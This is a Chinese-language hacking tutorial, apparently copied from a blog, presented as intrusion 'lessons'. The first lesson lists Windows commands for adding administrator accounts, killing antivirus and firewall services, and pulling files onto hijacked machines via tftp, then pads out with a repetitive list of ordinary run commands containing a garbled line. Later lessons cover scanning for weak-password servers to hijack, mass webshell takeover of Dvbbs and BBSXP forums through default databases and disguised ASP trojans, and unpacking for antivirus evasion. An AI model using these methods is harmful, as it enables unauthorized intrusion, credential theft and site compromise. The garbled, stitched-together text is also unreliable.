本文摘抄自http://www.cnitblog.com/zhangyafei/
第一课: 入侵必备DOS命令总结
一.对用户操做
net user ——–查看有哪些用户
net user guest /active:yes —— 激活guest用户
net user 用户名 密码 /add ——建立用户
net localgroup administrators 用户名 /add ——- 把“用户”添加到管理员中使其具有管理员权限
二.必备命令
net start —–查看开启了哪些服务
net start 服务名—–开启服务
net stop 服务名——停止某服务
netstat -an :查看端口的网络连接情况
ipconfig :查看本地ip地址
三.关防火墙,杀毒软件命令
net stop sharedaccess —-关系统自带防火墙
pskill.exe ravmon —–杀掉瑞星软件
pskill.exe pfw —-关天网防火墙
net stop “Symantec AntiVirus”—-关于诺顿企业版
net stop KAVStart——关闭金山杀毒
向肉鸡上传文件命令:
第一种方法:tftp
命令格式:tftp -i 你的公网IP get xx.exe
:计算机运行命令全集 winver———检查Windows版本
wmimgmt.msc—-打开windows管理体系结构
wupdmgr——–windows更新程序
winver———检查Windows版本
wmimgmt.msc—-打开windows管理体系结构
wupdmgr——–windows更新程序
wscript——–windows脚本宿主设置
write———-写字板winmsd—–系统信息
wiaacmgr——-扫描仪和照相机向导
winchat——–XP自带局域网聊天
mem.exe——–显示内存使用情况
Msconfig.exe—系统配置实用程序
mplayer2——-简易widnows media player
mspaint——–画图板
mstsc———-远程桌面连接
mplayer2——-媒体播放机
magnify——–放大镜实用程序
mmc————打开控制台
mobsync——–同步命令
dxdiag———检查DirectX信息
drwtsn32—— 系统医生
devmgmt.msc— 设备管理器
dfrg.msc——-磁盘碎片整理程序
diskmgmt.msc—磁盘管理实用程序
dcomcnfg——-打开系统组件服务
ddeshare——-打开DDE共享设置
dvdplay——–DVD播放器
net stop messenger—–停止信使服务
net start messenger—-开始信使服务
notepad——–打开记事本
nslookup——-网络管理的工具向导
ntbackup——-系统备份和还原
narrator——-屏幕”讲述人”
ntmsmgr.msc—-移动存储管理器
ntmsoprq.msc—移动存储管理员操作请求
netstat -an—-(TC)命令检查接口
syncapp——–创建一个公文包
sysedit——–系统配置编辑器
sigverif——-文件签名验证程序
sndrec32——-录音机
shrpubw——–创建共享文件夹
secpol.msc—–本地安全策略
syskey———系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc—本地服务设置
Sndvol32——-音罖@刂瞥绦?br>sfc.exe——–系统文件检查器
sfc /scannow—windows文件保护
tsshutdn——-60秒倒计时关机命令
tourstart——xp简介(安装完成后出现的漫游xp程序)
taskmgr——–任务管理器
eventvwr——-事件查看器
eudcedit——-造字程序
explorer——-打开资源管理器
packager——-对象包装程序
perfmon.msc—-计算机性能监测程序
progman——–程序管理器
regedit.exe—-注册表
rsop.msc——-组策略结果集
regedt32——-注册表编辑器
rononce -p —-15秒关机
regsvr32 /u *.dll—-停止dll文件运行
regsvr32 /u zipfldr.dll——取消ZIP支持
cmd.exe——–CMD命令提示符
chkdsk.exe—–Chkdsk磁盘检查
certmgr.msc—-证书管理实用程序
calc———–启动计算器
charmap——–启动字符映射表
cliconfg——-SQL SERVER 客户端网络实用程序
Clipbrd——–剪贴板查看器
conf———–启动netmeeting
compmgmt.msc—计算机管理
cleanmgr——-**整理
ciadv.msc——索引服务程序
osk————打开屏幕键盘
odbcad32——-ODBC数据源管理器
oobe/msoobe /a—-检查XP是否激活
lusrmgr.msc—-本机用户和组
logoff———注销命令
iexpress——-木马捆绑工具,系统自带
Nslookup——-IP地址侦测器
fsmgmt.msc—–共享文件夹管理器
utilman——–辅助工具管理器
gpedit.msc—–组策略
第二课:x-scan扫描器的使用技巧详解
一.详解x-scan的配置:
1.扫描模块设置:
1).开放服务
(2).远程控制系统
(3).nt-server弱口令—–administrator 空口令或弱口令.
(4).sql-server弱口令 —sa 空口令或弱口令.
2.扫描IP范围设置:
(1).指定IP范围.
(2).从文件中导入IP列表.
二.x-scan在入侵中的应用:
1.对系统的综合安全检测,有针对性的入侵.
2.找肉鸡
nt-server弱口令
sql-server弱口令
3.邮箱,ftp,vnc的破解
三.x-scan入侵实例演示部分:
1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)
2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)
s扫描—–扫开放1433的机子
x-scan扫描—–对开放1433的机子进行弱口令探测.
第五课:网站猎手批量入侵实战演示
黑天
一.二个重点要素:
1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.
选择技巧:一般选择论坛最低部的版权信息或程序名称.
2.检测的页面或文件: 也就是程序存在漏洞的地方
二.网站猎手批量入侵实战演示篇:
1.实战演示一:
检测的页面或文件: data/dvbbs7.mdb
关键字:Powered By :Dvbbs Version 7.0.0
由默认数据库到拿网站webshell过程:
第一步:下载动网默认数据库
第二步:在数据库中找管理员密码
技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.
第三步:在前台以jpg格式上传asp木马.
第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.
2.演示二:
检测的页面或文件:database/bbsxp.mdb
关键字:Powered by BBSXP 7.00
3.演示三:
检测的页面或文件:upfile_flash.asp
关键字:商城
四:关于批量得webshell的其它思路
1.思路一:
到大型源码下载中心,把下载量较大的源程序,下载回来研究.
主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.
然后用关键字结合网站猎手批量检测.很快就提到大量webshell
2.思路二:社会工程学批量入侵拿webshell
1.免杀
2.破解
3.程序汉化,个性修改.
二.脱壳四步骤:
第一步:查壳
常用查壳工具: PEID ,FI ,PE-SCAN 等.
第二步:找OEP
工具:ollydbg
第三步:脱壳
常用脱壳工具:
1.OD自带的脱壳插件:右键脱壳之.
2.LordPE:选择所调试进程右键,完整脱壳.
第四步:修复
Import REConstructor 1.6
三.在ollydbg脱壳中常用快捷键介绍
F2: 下断点.
F4:运行到所选择的那一行.—–遇到向上跳时用到
F7:单步进入—-遇到近call时用到.
F8:单步跟踪
F9:运行程序
Shift+F9 :忽略异常运行
Alt+M:打开内存镜像
什么时候用,用哪个?以后会在具体实践操作中具体讲
支付宝扫一扫
微信扫一扫
